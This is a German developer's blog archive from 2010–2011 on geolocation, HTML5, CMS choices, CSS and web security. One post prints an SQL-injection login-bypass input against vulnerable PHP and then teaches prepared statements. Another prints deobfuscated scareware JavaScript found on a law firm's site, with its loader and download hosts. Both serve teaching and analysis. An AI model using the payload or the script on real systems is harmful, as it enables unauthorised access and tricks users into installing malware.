Düsseldorf als Android-Hauptstadt. Ein Messfehler?

01 07 2011

Ich bekam gerade Sexkontakte in Frankfurt am Main angeboten. In Form von als Chatanfrage getarnter Werbung unten rechts im Browser. Und ich habe einen VDSL-Anschluss bei 1&1, die VDSL von der Telekom wiederverkaufen, also bin ich leider mittelbar Telekom Kunde. Leider, weil YouTube deswegen für mich in der Mehrzahl der Fälle so unbrauchbar war, dass ich dort nach 17:00 Uhr nur noch selten versuche, ein Video in 720p anzusehen. Vielleicht ist das inzwischen anders, aber meine Entscheidung, von der Telekom schnellstmöglich weg zu kommen, habe ich bereits getroffen.

Aber was haben die angebotenen Sexkontakte in Frankfurt am Main mit der Telekom zu tun? Nun:

1. Die Sexkontaktwerbung versucht anhand meiner aktuellen IP-Adresse zu erraten, wo ich mich befinde. Das klappt mal mehr, mal weniger gut; in dem Fall wohl weniger. Die IP-Adresse wird vom Provider vergeben. Ist ein bestimmter Adressbereich nicht mit sinnvollen Informationen in der verwendeten Ortsdatenbank verzeichnet, wird ersatzweise der Ort des Providers zurückgeliefert, so gibt es also immer wieder lustige Häufungen in den Städten, in denen die Provider ihre IP-Adressen registriert haben. So ähnlich wie die Nummernschilder von Mietwagen, falls sich mal jemand gefragt hat, wieso in ganz Deutschland so auffällig viele Fahrzeuge aus Hamburg oder Düren unterwegs sind.

2. Vor ein paar Tagen ging die Meldung um, dass auffällig viele Android-Nutzer aus Düsseldorf kommen und auffällig viele iPhone-Nutzer aus Frankfurt am Main, siehe etwa hier. Als Datenbasis dient ein Werbenetzwerk, das Ortsinformationen über die Einblendung mobiler Werbeanzeigen speichert.

3. iPhone-Nutzer sind wegen der jahrelangen Exklusivbindung signifikant häufig auch T-Mobile-Kunden.

4. Mit Vodafone und E-Plus/Base haben gleich zwei der drei anderen Netzbetreiber ihre Zentrale in Düsseldorf.

5. Apps können sich auf Smartphones das Recht einräumen, eine sehr bis mittelgenaue Ortung auf Basis von GPS, WLAN oder Mobilfunkzellen zu benutzen. Websites im Browser haben dieses Recht normalerweise nicht und müssen sich die Ortsinformationen wie beim Desktop-PC über die IP-Adresse herleiten. Hinzu kommt, dass die meisten Mobilfunk-Provider viele UMTS-Kunden hinter wenigen externen IP-Adressen verstecken und überhaupt keine IP-Adressen mit Ortsbezug vergeben. Wer mal eine Klausur bei mir geschrieben hat, sollte wissen: Aha, hier kommt das famose NAT zum Einsatz!

Wenn man nun eins und eins zusammenzählt, könnte man also auf eine naheliegende Erklärung für das Phänomen mit der auffälligen Smartphone-Ungleichverteilung kommen. Das wäre ja mal eine schöne Klausurfrage.

Disclaimer: Ich habe die zugrunde liegende Studie weder gelesen, noch mich überhaupt eingehend damit beschäftigt, also ist mein Einwurf als bloßes Postulat zu werten.


Standortdaten im Browser auf stationären Computern

12 02 2011

Jaja, irgendwann ist alles mobil und wireless und in der Cloud, aber bis dahin benutzen wir noch ab und an bis immer stationäre Computer, die an Kabeln hängen. Die meisten modernen Desktopbrowser (auch der IE ab Version 9) unterstützen die Abfrage von Standortinformationen durch Websites, etwa um bequem die nächste Filiale von Laden X zu finden oder sich bei Foursquare einzuchecken. Das ist schön und mit Notebooks funktioniert wohl das dank WLAN-Erkennung auch ohne GPS überraschend gut. Auf Computern ohne WLAN wird aber lediglich die IP-Adresse zur Erkennung des Ortes herangezogen, was die Genauigkeit auf irgendwo zwischen Stadtmitte der aktuellen Stadt und Langen in Hessen drückt, mithin also zum einen reichlich nutzlos ist, zum anderen aber auch Serverseitig anhand der IP-Adresse gemacht werden kann, ganz ohne Mitwirkung des Besuchers.

Da sich Geräte ohne WLAN in der Regel nur an einem Ort aufhalten, wäre es nun konsequent, wenn man im Browser einmal seine Position festlegt und fortan eine richtige Positionsangabe hat. Doch weit gefehlt. Weder Opera 11, noch Firefox 3.6 oder Chrome 9 bieten eine Möglichkeit, seinen aktuellen Ort manuell einzustellen, es wird einfach alternativlos der auf der IP-Adresse basierende Dienst von Google benutzt. Für den Firefox gibt es immerhin ein Add-On namens Geolocater für genau diesen Zweck, aber sowas gehört direkt in den Browser. Ich frage mich ernsthaft, wieso kein Browserhersteller es für nötig hält, dass ein Nutzer seine gemeldete Position manuell festlegen kann. Hat da jemand eine Antwort?


HTML5-Elemente auch im IE ohne JavaScript und trotzdem valide

20 12 2010

Ha, na sowas. Da kommt jemand mit einer relativ eleganten Möglichkeit um die Ecke, dem IE die neuen HTML5-Elemente auch ohne JavaScript bekannt zu machen. Er benutzt dafür einen XML-Namespace und benutzt dann so Sachen wie html5:section statt section. Das ist geradezu genial und funktioniert angeblich sogar zuverlässig, validiert aber in erster Linie nicht, wenn man sich nicht mit XHTML5 ganz anderen Ärger ins Haus holen will. Daneben ist es auch komisch, wenn der Autor so ein HTML schreiben muss, nur um auf den IE Rücksicht zu nehmen. Wie ließe sich das also noch verbessern?

Mir kam sofort die naheliegende Idee, das mit einem serverseitigen Ausgabefilter nur an die IEs auszuliefern. Die Voraussetzung wird nicht jedes CMS einfach so mitmachen, aber falls doch, ermöglicht einem das, die HTML5-Elemente jetzt zu benutzen. Wie genau soll das funktionieren? Wenn man einen serverseitigen DOM/HTML-Parser benutzt, ist es relativ leicht, aber das sollte in der CMS-Landschaft die große Ausnahme sein. Also braucht man ein paar simple RegExes:

  • <html muss im HTML-Output durch <html xmlns="http://www.w3.org/1999/xhtml" xmlns:html5="http://www.w3.org/1999/xhtml" ersetzt werden. Wenn man gründlich arbeitet, prüft man vorher, ob das HTML-Element nicht schon die passenden Namespaces trägt.
  • <(/?)(abbr|article|aside|audio|canvas|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video) muss im HTML-Code durch <$1html5:$2 ersetzt werden, das sind die öffnenden und schließenden Tags.
  • (abbr|article|aside|audio|canvas|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video) muss im CSS durch html5\:$1 ersetzt werden.

Das schöne an dieser Lösung ist, dass man Serverseitig recht einfach einen IE erkennen kann und ihm die gefilterten Quellen anbietet. Dass der Code für den IE nicht validiert, halte ich für verschmerzbar. Falls man versehentlich einen Browser erwischt, der sich nur als IE ausgibt, klappt zudem trotzdem alles. Und das wichtigste in meinen Augen ist, dass man die CSS Spezifität nicht verändert und sich auf diesem Weg keine Seiteneffekte ins Boot holt. Gut so.

Der einzige Nachteil, den ich momentan sehe, ist die Voraussetzung eines finalen Output-Filters. Viele CMSe buffern den HTML-Output sowieso und bieten einen Hook an, an den man sich einfach dranhängt, in dem Fall hat man natürlich leichtes Spiel. Etwas schwieriger ist das bei CMSen, die sowas nicht haben und vor allem bei statischen CSS-Dateien, in dem Fall muss man irgendwie einen Filter in den Workflow frickeln, was stark von der eingesetzen Serverumgebung abhängt und nicht einfach generalisiert lösbar sein wird. Wenn man aber sowieso schon ein CSS-Framework wie Turbine einsetzt, lässt sich das prima dort lösen, vielleicht gar mit einem HTML5-Enabler Plugin. Ansonsten wäre das mal ein guter Anlass, so ein Framework einzusetzen.

Damit löst man aber noch immer nicht das Cache-Problem: Man muss externe Proxy-Caches aushebeln und benötigt zudem plötzlich zwei lokale Caches, die von der Cache-Logik unterschieden werden müssen. Da wird es dann diffizil und man verzichtet vielleicht lieber auf eine Browser-Unterscheidung, macht den Output-Filter immer an und scheißt auf den Validator. Ist ja auch eine Lösung und man muss weiterhin nicht selbst mit den Namespaces hantieren.


Terminfindungswebdienst

28 11 2010

Seit ein paar Jahren veranstalte ich mit ein paar Kollegen in unregelmäßigem Abstand einen kleinen Jour-Fixe, die Terminabsprache findet in einer Mailingliste statt. Die Erfahrung damit zeigt, dass das schon bei 6 Leuten unübersichtlich wird und eine klare Diskussion für Alternativtermine nicht ganz leicht ist. Nun kommt noch ein mehr oder weniger regelmäßiger Spieleabend dazu, an dem auch noch Leute teilnehmen werden, denen ich die korrekte Bedienung einer Mailingliste gar nicht erst zutraue. Es muss also eine alternative technische Unterstützung hinzukommen. Spontan fällt mir da nur Doodle ein, aber deren tabellenartiges System geht mir nicht weit genug, weil es die komplexen Zusammenhänge von Zusagen nicht abbilden kann. Dass man mehrere Daten zur Wahl hat und nur entweder sagen kann, ob man kann oder nicht, reicht eben nicht. Also überlege ich, sowas schnell mal selbst zu schreiben. Aber was braucht es für ein Featureset? Nach ein wenig Nachdenken bin ich auf folgende Funktionen gestoßen:

  • Es muss geschlossene Gruppen geben, die per E-Mail abonnierbar sind. Neue Terminvorschläge (mit oder ohne Alternativen) und Änderungen gehen als Benachrichtigung raus, ein Klick auf einen Link in der Mail sollte dabei direkt einen Status setzen können, ohne, dass man sich extra einloggen muss. Es sollte zudem auch offene Gruppen/Events mit und ohne Einladung geben.
  • Bei mehreren Terminvorschlägen für ein Event muss es eine intuitive Priorisierung geben, vielleicht per Drag and Drop, vielleicht anders. Man muss ausdrücken können, dass einem Termin A lieber als Termin B ist, man aber bei Termin C gar nicht kann. Zudem muss unterschieden werden zwischen benachrichtigt, aber nicht reagiert und einer expliziten Ablehnung.
  • Es muss eine Möglichkeit geben, vielleicht bzw. unter Vorbehalt zuzusagen. Daraus ergibt sich auch die Anforderung, dass es einen leicht zugänglichen Kommentar zu jedem eigenen Voting geben muss. So ein Kommentar sollte nicht chronologisch aufgeführt werden, sondern als Metainformation zum Voting.
  • Man muss seine Votings ändern können, ein Zeitstempel für die letzte Änderung muss dabei veröffentlicht werden. Außerdem sollten Events auch vor ihrem eigentlichen Datum als abgeschlossen markiert werden können.
  • Es sollte die Möglichkeit geben, dass der Eventbesitzer bestimmte oder alle Personen als "Muss dabei sein" oder "Wäre schon wichtig" markieren kann. Zudem sollte er den Usern der Gruppe freistellen können, solche Bedingungen für sich (und ggf. auch andere) zu definieren.
  • Es sollte einen Kommentarbereich geben, wo kurze Diskussionen ausgetragen werden können (etwa "Was essen wir?).
  • Die Votingtabelle sollte via iFrame anderswo einbindbar sein.
  • Die Softwarebasis sollte unter einer Open-Source-Lizenz veröffentlicht werden, so dass jedermann so ein System für sich aufsetzen kann. Möglicherweise kann man sowas auch als Cloud-Dienst für andere anbieten.
  • Es muss eine API (mindestens JSON) geben, über die der Dienst (wahlweise) auch von Außen bedienbar wird. Authentifizierung könnte per oAuth gemacht werden, standardmäßig aber per Cookie und bei Mails via Token. Sicherheit bei der Authentifizierung sollte im Zweifel gegenüber Komfort bei der Nutzung nachrangig behandelt werden.
  • Die Oberfläche sollte optisch angenehm sein und sich mit ausgeprägter AJAX-Unterstützung flüssig bedienen lassen. Ein Fallback mit Mindeststandard für Nutzer ohne JavaScript könnte implementiert werden, aber es dürfen dadurch keinerlei Komforteinbußen bei Nutzern mit JavaScript entstehen. Der Internet Explorer 6 (und ggf. auch 7) wird als Browser nicht berücksichtigt, solche Nutzer werden entweder gewarnt (und können es dann wenigstens mal versuchen) oder sofort abgewiesen. Ausnahme: Der Request wird trotzdem ausgeführt, klicks auf Links in Benachrichtigungsmails müssen immer funktionieren. Technisch wird auf CSS3 und HTML5 gesetzt, als JavaScript-Framework kommt jQuery zum Einsatz, serverseitig basiert das System auf PHP 5.3 (und MySQL oder SQLite via PDO) und ggf. auf einem Framework (Symfony, Zend, Flow3). Gegen ein Framework spricht, dass man das System ggf. kapseln könnte, um es als PlugIn für verschiedene CMSe zu portieren. So komplex sollte das nicht sein und das MVC-Paradigma und andere Design-Patterns kann man auch so nutzen. Der Login-Mechanismus (samt Gruppen- und Userverwaltung), der Dispatcher (für das Routing der Requests und vor allem der API) und das Model müssten dann modular aufgebaut und austauschbar sein, die Output-Templates sind es ja sowieso schon.
  • Ggf. könnte das System nicht nur für Events genutzt werden, sondern auch für die allgemeine Entscheidungsfindung. Man stellt also etwa Pizza, Asia, Pommesbude, Döner und Nudeln zur Wahl und bekommt am Ende eine Entscheidung mit dem besten Kompromiss. Da wird besonders deutlich, wie wichtig eine Einstufung jenseits von ja und nein ist.

Habe ich eine wichtige Funktion vergessen? Gibt es Input? Meldet Euch einfach bei mir, aber denkt daran, dass ich kein ICQ mehr benutze.


Die lustige SQL-Injection am Morgen

30 10 2010

Gelegentlich habe ich das Vergnügen, in fremdem PHP-Code zu wühlen. Über die Nichteinhaltung irgendwelcher Coding-Standards ärgere ich mich deshalb nicht mehr, weil das der Normalfall ist. Was mich aber immer wieder bass erstaunt, ist die Anfälligkeit für SQL-Injections. Im Jahre 2010 sollte sich doch wirklich auch zum letzten PHP-Frickler herumgesprochen haben, das Konstrukte wie diese beiden hier wahnsinnig sind:

$sql = "SELECT * FROM tabelle WHERE ort = '" . $_POST['ort'] . "'";
$sql = "SELECT * FROM users WHERE username = 'admin'
  AND password = '" . $_POST['password'] . "'";

Gibt man nun im zweiten Beispiel ein kleines leckmich' OR 1 OR password = ' ein, macht PHP daraus folgendes SQL-Statement:

$sql = "SELECT * FROM users WHERE username = 'admin'
  AND password = 'leckmich' OR 1 OR password = ''";

Et voilà, wir sind als Admin eingeloggt. Das ist ein echtes Beispiel, das mir mal den Zugang zu einem Admin-Backend ermöglicht hat, zu dem ich auf die Schnelle keine Zugangsdaten bekommen konnte. In dem Fall war das ein Segen, weil es mir die Arbeit erleichtert hat, aber auf die Idee hätte auch irgendwann jemand anderes kommen können. Es gibt auch ein legendäres XKCD dazu, das ich gerne als Einstieg in meiner Vorlesung benutze, wenn es um Computersicherheit geht.

Manchmal wird $_POST immerhin vorher irgendwie geprüft oder gefiltert, Konstrukte wie das folgende sind also im Grunde recht klug gedacht:

$connection = mysql_connect('localhost', 'user', 'password');
mysql_select_db("dbnamme", $connection);
if ( preg_match('/[\w\(\)\.-]/iu', $_POST['ort']) )
{
  if ( $result = mysql_query("SELECT * FROM tabelle WHERE ort = '" . $_POST['ort'] . "'") )
  {
    $row = mysql_fetch_array($result);
  }
}

Allerdings neigt man bei solchen Sachen dazu, im Eifer des Gefechts die wichtige Prüfung auf ungültige Zeichen zu vergessen oder unter bestimmten Randbedingungen gar nicht ausführen zu lassen. Es gibt unzählige Möglichkeiten, eine SQL-Injection zu vermeiden, irgendeine davon sollte genutzt werden. Mein Favorit ist eindeutig die Nutzung eines Frameworks, das sich darum kümmert, oder eben die eigene Datenbankprogrammierung ausschließlich über prepared statements und PDO. Letzteres sieht dann für obige Funktionalität vereinfacht etwa so aus:

$dbh = new PDO('mysql:host=localhost;dbname=dbname', 'user', 'password');
$stmt = $dbh->prepare("SELECT * FROM tabelle WHERE ort = :ort");
if ( $stmt->execute(array(':ort' => $_POST['ort'])) )
{
  $row = $stmt->fetch(PDO::FETCH_ASSOC);
}

Hier sorgt das prepared statement von PDO dafür, dass zuerst der SQL-String mit Platzhalter an die Datenbank übertragen wird, und später getrennt davon der Inhalt von $_POST['ort']. Keine SQL-Injection möglich an dieser Stelle, wir können ruhig schlafen. Und das beste ist, es ist nicht mal wirklich komplizierter, schwieriger oder mit mehr Code verbunden, einfach sicherer. PDO kann übrigens noch mehr, etwa sehr komfortabel mit Transaktionen umgehen, die dann wichtig werden, wenn man mehrere voneinander abhängige Schreiboperationen auf der Datenbank durchführt und die nur entweder ganz oder gar nicht haben will. EIn Blick die Dokumentation zu PDO zeigt noch etliche andere Vorteile auf und PHP mindestens in Version 5.1 sollten wir inzwischen doch hoffentlich alle haben.

Neben SQL-Injections gibt es noch unzählige weitere Angriffsflächen auf Webapplikationen, aber wenn man schon an so offensichtlichen Grundlagen scheitert, sollte man die eigene Programmierleistung noch mal grundlegend auf den Prüfstand stellen. Vielleicht sollte man auch lieber stricken oder kochen, wenn man da grundlegende Fehler macht, fängt man sich nicht direkt einen Servereinbruch ein. Wer fürs Web programmiert, trägt eine gewisse Verantwortung; sich also zumindest ein klitzekleines Basiswissen an sicherer Programmierung zuzulegen, darf doch erwartet werden. Vor allem, wenn in dem Admin-Interface Kundendaten einsehbar oder gar veränderbar sind, oder man dort anderen Schindluder mit wichtigen Dingen treiben kann. War in obigem Fall nicht so, immerhin.

Klar passieren einem Programmierfehler, aber Daten ungeprüft aus $_POST (oder sonstigen vom Benutzer kontrollierten Quellen) in eine Datenbankabfrage zu übernehmen geht wirklich ganz und gar nicht, nie und nimmer. Das ist ein unverzeihlicher Fehler und zeugt von mangelndem Grundverständnis der Thematik. Wenn ich sowas sehe, frage ich mich immer, ob der jeweilige Programmierer überhaupt ansatzweise weiß, was er da macht. Wenn das ein Anfänger bei seiner ersten Clan-Homepage macht, kann man darüber ja noch lachen, aber wenn Geld fließt, kann man sich solche Sperenzchen einfach nicht mehr leisten.

Nachtrag 01.11.2010: Besonders schön sind übrigens Kommentare wie //Schutz vor SQL-Injection, die nur wenige Zeilen unterhalb einer anderen gefährdeten SQL-Abfrage kommen. Offenbar ist das Problem grundsätzlich bekannt, aber etwas dagegen tun tut man dann doch nur, wenn man mal Lust darauf hat. Warum nur?


Ist Joomla ein Hort für Stümper?

05 10 2010

Vorweg: Ich habe mal im Jahr 2005 für ein Projekt einen genaueren Blick in das CMS Joomla geworfen und mich klar dagegen entschieden. Ich weiß nicht mehr im einzelnen, wieso, aber die Entscheidung war sehr klar und fiel seinerzeit zugunsten von TYPO3 aus, das ich seitdem hervorragend bewährt hat. Ich weiß also im Grunde nicht viel über Joomla. Irgendwann habe ich mal beim Multimediatreff in Köln einen Vortrag zur Joomla-Entwicklung gehört, bei dem der (oder die?) Vortragende keinen leichten Stand hatte: Das Publikum war offensichtlich der Meinung, dass Joomla eher zu den weniger ernstzunehmenden Content-Maganement-Systemen gehört; zudem überzeugte auch der Vortrag kaum vom Gegenteil. Auch sonst haben Joomla-Integratoren einen schweren Stand in meiner Peergroup. Genau genommen habe ich nicht eine Empfehlung für Joomla von jemandem gesehen, den ich in Sachen Webentwicklung üblicherweise ernst nehme. Vielleicht ist das Zufall, aber ich kenne auch niemanden, der jemanden kennt, der Joomla einsetzt und dabei – wie auch immer definiert – gut ist.

Wo mir Joomla aber häufig begegnet, ist bei sehr günstigen Angeboten für Webseiten (sowohl Wettbewerb für, als auch zur beratenden Prüfung durch mich). Fast immer sind das 1-Mann-Agenturen, deren Angebote und vor allem deren Auftreten mich nicht von gesteigerter technischer Kompetenz überzeugt. Ganz häufig sind das Quereinsteiger, die sich autodidaktisch irgendwie HTML und CSS angefressen und im Zuge der Joomla-Integration auch ein paar Brocken sehr schlechtes PHP angeeignet haben. Ich möchte das nicht generell kritisieren, jeder fängt mal an und lernt den Kram im Laufe der Zeit irgendwie mehr oder weniger gut. Das Problem ist, dass bei den Leuten, die mir im Joomla-Kontext begegnet sind, das weniger dominiert. Das heißt nicht, dass jeder Joomla-Integrator ein Stümper ist; nur eben, dass er sich in einem Umfeld mit auffällig vielen Stümpern bewegt.

Frage ist: Warum ist das so? Ist Joomla ein schlechtes CMS? Meiner Meinung nach ja, aber das ist wenig objektiv. Aber irgendwas muss doch da dran sein, wenn es so beliebt ist. Module zusammenstöpseln und eine irgendwie lauffähige Seite bekommen, ohne sich groß einarbetien zu müssen, können auch andere Systeme. Was ist es also, was all die Stümper und Anfänger so anzieht? Warum setzt man ein System ein, dessen nach vielen Jahren endlich erscheinende neue Version ungefähr das halbe Featureset von anderen Systemen vor fünf Jahren implementiert? Stichwort Rechtesystem oder tabellenfreier HTML-Output der Core-Funktionen. Weil es so einfach in der Integration ist und man vom Wissensstand her nicht in der Lage ist, ein besseres System einzusetzen? Dann stellt sich aber die Frage: Warum nimmt man Geld für eine Dienstleistung, wenn der eigene Wissensstand gerade mal für das einfachste Werkzeug reicht? Immerhin muss man den Joomla-Integratoren der Kreisliga lassen, dass sie meistens auch nur Kreisliga-Preise aufrufen. Wenn ich aber bei günstigen Nebenberuflern die Wahl habe zwischen einem ambitionierten Studenten und einem Feierabend-Joomla-Bastler, gewinnt der ambitionierte Student. Joomla im Angebot ist für mich ein klar schlechtes Zeichen, das würde ich nicht buchen. Gemeine Vorurteile? Vielleicht, aber auch das ist bei der Wahl eines CMS für Angebote für Geld zu berücksichtigen.

Aber mit der nächsten Version kommen doch endlich alle wichtigen Features… Ja, schön. Schon mal die Planungen für TYPO3 5.0 gesehen? Nein? Weil das noch nicht relevant ist, weil es in ferner Zukunft passiert? Genau. Handfeste Defizite in der aktuellen Version mit Planungen für die Zukunft zu entschuldigen, ist nicht zielführend, weil die anderen sich ebenfalls weiterentwickeln. Während in Villabajo noch mit einem benutzbaren Rechtesystem gekämpft wird, redet man in Villarriba von Aspektorientierter Programmierung, MVC, Content-Repositories und (vielleicht endlich mal praxistauglichem) Frontend-Editing.

Empfehlungen, die ich übrigens über die Jahre immer wieder gehört habe, sind ModX (das als Geheimtipp gilt), TYPO3 (das ich selber häufig nutze), Wordpress (weil alle es nutzen, es ein tolles Backend hat und es so schön nah am Code operiert), Textpattern (das ich vom Konzept her gar nicht mochte, das aber von seinen Fans vehement vertreten wird), Drupal (vor allem im Community-Kontext) und verschiedene kleinere recht charmante Systeme.


Please put the C in CSS

24 09 2010

Fast immer, wenn ich an Websites arbeite, die andere (Agenturen) verbrochen haben, stolpere ich über mehr oder weniger lästige Eigenheiten der konkreten Implementierung. Dass man TYPO3 auf etliche verschiedene Weisen mit Templates füttern kann, ist ja normal, auch dass es Abweichungen in der Sorgfalt im Umgang mit HTML-Markup und CSS-Code gibt. Aber es gibt Abweichungen im Rahmen des Nachvollziehbaren und solche, die einfach dumm, lästig und ärgerlich sind.

Aktuelles Beispiel: Ich mache zur Zeit einige inhaltliche Änderungen an einer Website, deren CSS-Code sehr eigenartig ist. Die auffälligste Eigenart ist dabei wirklich spaßig: Man hat dem BODY ein text-align: center; gegeben, ohne das bei nächster Gelegenheit, etwa einem Wrapper, wieder zurückzunehmen. Nun könnte einem im weiteren Verlauf auffallen, dass nun alles, aber wirklich alles zentriert wird. Das ist natürlich nicht zu übersehen und vor allem ziemlich lästig. Ich und die meisten anderen Frontend-Entwickler, die ich kenne, würden nun unseren Fehler bemerken und dem Wrapper ein text-align: left; zuweisen, wie es best practice ist. Nicht so der Entwickler dieser Website, denn der gibt der mittleren Content-Box diese Eigenschaft und zudem noch mal allen möglichen anderen Boxen, die nicht zentrieren sollen. Bei der Gelegenheit habe ich mal die style.css geöffnet und staunte nicht schlecht: Fast alle vergebenen Styles sind per ID an verschiedene Content-Boxen drangehängt, so dass beispielsweise eine H2 in Box A gestyled ist, in Box B, C und D und überhaupt anderswo nicht; was wiederum bedeutet, dass sie fast überall zentriert ist (und sonst die Standardeigenschaften des Browsers für H2 hat). Das ist eine Wartungshölle sondergleichen, denn bei jeder Inhaltsänderung, die über den initialen Zustand der Site hinausgeht, muss man den Style anfassen. Letztlich hat man also etwas ähnliches, wie inline-styles, nur eben in eine externe Datei ausgelagert und auf unvorhersehbare Weise mal wirkungsvoll und mal nicht. Die Vorteile der Kaskadierung werden also nicht ausgespielt, die Nachteile aber schon.

Nun wäre es eine Kleinigkeit, das alles zu korrigieren, aber dann schlägt gnadenlos der Nachteil der Kaskadierung zu: Man weiß nicht, welche Seiteneffekte sich bei grundlegenden Änderungen ergeben. Nimmt man etwa die Zentrierung für alles heraus, wird man gar nichts mehr zentriert vorfinden, weil bei absichtlich zentrierten Elementen möglicherweise eine Angabe zur Zentrierung weggelassen wurde, weil sich das ja implizit aus der nicht zurückgestellten Zentrierung des BODYs ergibt. Ohne eine genaue Analyse des Stylesheets und der Seitenstruktur, sowie umfangreiche Tests wird man solche Änderungen also besser nicht machen. Ich halte mich in solchen Fällen einfach an das vorgegebene System und ergänze meine nötigen Styles entsprechend. Das macht es nicht besser, aber wenigstens wird man – ohne daran Schuld zu sein – für jede dieser Änderungen angerufen und bezahlt.

Die ahnungs- oder lustlose CSS-Schluderei ist nur ein Aspekt dieser Website, auch die URLs der Seiten (mit CoolURI gemacht) waren weit entfernt von Sinn und Zweck einer guten URL-Struktur. Die Menüs sind lieblos zusammenkopiert, das Hauptmenü ein manuell erstelltes (und manuell zu pflegendes) Imagemap-Ungetüm, das einen besonders spannenden Nebeneffekt zeigt: Sind Seiten in TYPO3 nicht über zumindest irgendein automatisch erstelltes Menü zu erreichen, kann CoolURI die URL der Seite nicht wissen und wirft eine Fehlerseite. Man muss nun für jede dieser Seiten einen manuellen Eintrag in CoolURI vornehmen und den bei Änderungen auch Pflegen. Besonders lustig ist das, wenn man die URL-Struktur nach umfangreichen Änderungen neu startet und dann das Hauptmenü nicht funktioniert. Falls man eine automatische Sitemap hat, kann die einen immerhin retten. hat man hier aber nicht. Solche Schludrigkeit zieht sich durch das gesamte Projekt und macht erhebliche Mehrarbeit bei der Pflege. Kein Wunder, dass direkt nach Projektabschluss alle Passwörter geändert wurden und die Änderungen bei mir landen. Leider ist das kein Einzelfall, gerade im TYPO3-Kontext treffe ich immer wieder auf haarsträubende Implementierungen. Ob die Agenturen, die immerhin explizit TYPO3 anbieten, zu dumm oder zu faul sind, weiß ich nicht.

Also aufgemerkt: Wenn man jemanden beauftragt, eine Website umzusetzen, gerade bei TYPO3 und anderen komplexen Systemen, achte man auf einen Dienstleister mit Ahnung und Bock. Nur billig billig schnell schnell führt einen zu oft schon mittelfristig aufs Wartungs-Glatteis. Mir ist das recht, wenn ich der Typ bin, der jammern darf und dabei auch noch gut an der Schludrigkeit anderer verdient.


Lustige Malware-Analyse

21 09 2010

Gerade rief ein Kunde an und schilderte mir ein interessantes Phänomen auf der (sowieso schon sehr gruseligen) Website eines Anwalts: Auf einer Unterseiteeite kommt eine Abfrage mit folgendem Text:

Windows Security Center Virus (I-Worm.Troian.B) was found on your computer Click OK to install System Security AntiVirus

Klickt man Abbrechen, kommt folgende Meldung, die man nur abnicken kann, um postwendend wieder bei der ersten Abfrage zu landen.

Windows Security Center recommends you to install System Security Antivirus.

Seine Vermutung war korrekt: Das ist keine Warnung eines Virenscanners, sondern ein Versuch, einem etwas unterzujubeln. Ein Blick in den Quelltext verrät erst mal, dass man es hier mit einem verschachtelten Frameset zu tun hat, also muss man etwas suchen. Jeweils zwischen Vor- und Nachnamen der Kanzleipartner ist ein externes Script von http://google-stats50.info/ur.php eingebunden. Dieses wiederum enthält ein langes Array mit vierstelligen Zahlen und etwas JavaScript Logik, um daraus wieder ausführbaren Code zumachen. Den Inhalt der Datei kann man beispielsweise bei jsFiddle ausführen, wobei man das abschließende eval() durch ein harmloses alert() ersetzt. Dabei kommt der folgende Code heraus, den ich anonymisiert und der Lesbarkeit halber neu formatiert habe:

function download() {
  var ifr5="<iframe style='display:none;' src='http://update1.your-guardian.com/index2.php?abbr=MSS&setupType=with_gui&setupName=setup&uid=VIERSTELLIGEZAHL&ttl=ELFSTELLIGERHASH'></iframe>";
  document.body.innerHTML = ifr5 + document.body.innerHTML;
}

var count=1;

function myconfirm() {
  var UserWidth = window.screen.width / 2;
  var UserHeight = window.screen.height / 2;
  window.resizeTo(screen.width-9999,screen.height-9999);
  window.moveTo(UserWidth,UserHeight);

  if(count<20) {
    count = count+1;
    window.onblur = function() {}
    if(confirm('Windows Security Center\n\nVirus (I-Worm.Troian.B) was found on your computer\n\nClick OK to install System Security AntiVirus')) {
      alert('You must SAVE AND RUN System Security AntiVirus - IT WILL HELP YOU TO SAVE YOUR PC AND DATA');
      window.focus();
      setTimeout('window.onblur=function(){myconfirm();}',100);
      download();
    } else {
      alert('Windows Security Center recommends you to install System Security Antivirus.');
      myconfirm();
    }
  } else {
    window.resizeTo(window.screen.width,window.screen.height);
    window.moveTo(UserWidth,UserHeight);
  }
}

So, wir kommen der Sache schon näher, unsere Meldungen stecken hier im Klartext drin und wir sehen auch, was beim Klick auf OK passiert: Es wird ein iframe eingefügt, der eine Datei zum Download anbietet. Der ttl-Parameter der aufgerufenen iframe-Quelle sorgt übrigens dafür, dass der Download nur in einem kurzen Zeitfenster funktioniert. Scheinbar soll so die Analyse erschwert werden, ich musste mich also etwas beeilen. Die Datei, die dann heruntergeladen wird, scheint ein Installer für einen Fake-Virenscanner zu sein. Klickt man übrigens je 20 mal auf Abbrechen und die darauf erscheinende Warnmeldung, kommt man aus der Nummer auch wieder heraus. Ziemlich freundlich für eine Malware. Also doch nicht so spannend, wie es auf den ersten Blick aussah. Keine ausgenutzten Sicherheitslücken, keine wirklich bösen Malware, nur ein Wald-und-Wiesen Scareware-Scheiß. Dann frage ich mich allerdings, wieso der Quelltext verschleiert wird?

Viel spannender ist allerdings, wie das böse Script auf die Website der Anwaltskanzlei gekommen ist. Untypisch für eine automatische Infektion ist, dass das Script zwei mal genau zwischen Vor- und Nachname platziert wurde. Normalerweise landen automatische Infektionen doch irgendwo am Anfang oder am Ende einer Seite oder irgendwo mehr oder weniger zufällig eingestreut. Haben wir es hier mit einer manuellen Infektion zu tun? Aber warum wird das Script dann gleich zwei mal auf einer Seite eingebunden? Sowieso ist die Seite dubios, beispielsweise liegt sie, wie bereits erwähnt, in einem verschachtelten Frameset und die einzelnen Frameseiten werden von einer IP-Adresse geladen, nur der Hauptframe wird unter der Domain angezeigt. Optik und Quellcode sind gruselig, die ganze Seite wirkt hoffnungslos veraltet und ungepflegt. Dazu diese Infektion. An so einen Anwalt würde ich mich wohl eher nicht wenden.

Nachtrag 22.09.2010: Inzwischen ist das Ladescript http://google-stats50.info/ur.php nicht mehr erreichbar und die Infektionen der davon betroffenen Websites laufen ins Leere. Das ist ja sowieso die Achillesverse solcherlei Angriffe: Sobald der verwendete Loader offline ist, ist der Spaß vorbei.


Objektorientierte Entwicklung vs. PHP 4

05 05 2010

